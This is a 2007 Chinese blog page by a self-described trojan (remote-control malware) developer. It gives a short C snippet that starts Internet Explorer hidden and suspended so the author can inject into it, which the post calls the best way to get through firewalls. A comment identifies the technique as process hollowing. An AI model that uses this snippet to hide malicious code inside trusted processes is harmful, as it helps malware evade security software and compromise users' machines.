冷风

心专十年 功必成 QQ: 121121606

用户操作
[即时聊天] [发私信] [加为好友]
冷风ID:chinafe
84850次访问,排名1213,好友4人,关注者9人。
专注于远程控制(木马)程序开发
chinafe的文章
原创 121 篇
翻译 0 篇
转载 3 篇
评论 41 篇
最近评论
菜农:下载了啊/

但不知道怎么打开FTP啊? 地址是那个地址啊?
xets007:呵呵,先提供域名更新代码
先加几个edit控件,关联各个变量,比如m_user关联的为3322的用户名,m-pass关联的是3322的密码,m_domain关联的是3322的域名,所有变量都为CString型
那么在加一个CString 型变量m_url用来存放我们构造的特殊的用来更新ip的网子.那么m_rul= "http://"+m_user+":"+m_pass++……
king:冷风,加油.
jwybobo:我要拜师学艺
sec:这样建立的进程还没进行初始化,当然占用的内存少了
这个是傀儡进程注入常用的
欢迎加群 11610254 ╃旋转木马
文章分类
收藏
相册
K兄弟
brain
lyyer 乐乐
农夫
夕草
子曰
小CC
彼方的苍穹
雪山地客
高手
uuty
Yamir's Blog
云风BLOG
徐艺波
罗聪~~天空之城
酷狗
国外站点
codeguru
codeproject
opensc
opensc RAT
opensc RAT
SWERAT
好友
C++ Builder 研究
Botdoor
evilcoder
Flyh4t
xgym(荔明奇)
冷风
千年
单克隆抗体
幽游
潇湘紫夜
好站
CSDN论坛
CVC病毒
forhimmedia
IT者VC版块
USB 技术社区
VC知识库
华e科技论坛
安全焦点
小榕论坛
幻影旅团
火狐联盟
电脑编程技巧与维护
白细胞
看雪论坛
程序员与开发者之家
网络
网络协议分析
逆转ACE
驱动学习
驱动开发网
黑客防线
美术美工
图片处理
言情小说网
设计中国
木马作者
Bifrost
PCVIEW
ZXshell
外挂技术
外挂研究院
外挂饭馆
组织联盟
东南网安联盟
中国黑客联盟
乌托邦
安信网络
安全警戎线
暗黑网马
破解炉子
第八男人
脚本安全小组
邪恶八进制
黑色技术
存档
订阅我的博客
XML聚合  FeedSky

原创 注入IE后使用内存不过4500K收藏

新一篇: 程序自删除实现 可用的SDK的 | 旧一篇: 在VC中使用ListCtrl保存上线主机SOCKET句柄

IE是一个很喝内存的东西,这点让我很头疼,注入IE是穿透防火墙的最好办法,以前好像在什么地方看过解决这个问题的
方法,就是只创建一个进程但不运行它,后来在 "木马编写技术" 的群里问了下,英俊潇洒的幻影和草草给了代码为:

    char    SystemPath [MAX_PATH];

    STARTUPINFO si;
    PROCESS_INFORMATION pi; 
    si.cb 
= sizeof(STARTUPINFO);
    GetStartupInfo(
&si); 
    si.wShowWindow 
= SW_HIDE;
    si.dwFlags 
= STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    GetSystemDirectory(SystemPath,MAX_PATH);

    strcat(SystemPath,
"\..\..\Program Files\Internet Explorer\iexplore.exe");
    CreateProcess(SystemPath,NULL,NULL,NULL,
true,CREATE_SUSPENDED|DETACHED_PROCESS,NULL,NULL,&si,&pi);




上面的代码是用来启动一个IE,与通常的不同之处在于CreateProcess 的CREATE_SUSPENDED|DETACHED_PROCESS参数
这样测试的时候,IE的占用不会超不4500K,

发表于 @ 2007年08月13日 13:06:00|编辑

新一篇: 程序自删除实现 可用的SDK的 | 旧一篇: 在VC中使用ListCtrl保存上线主机SOCKET句柄

评论

#sec 发表于2007-08-17 01:43:06  IP: 221.219.62.*
这样建立的进程还没进行初始化,当然占用的内存少了
这个是傀儡进程注入常用的
欢迎加群 11610254 ╃旋转木马
Csdn Blog version 3.1a
Copyright © 冷风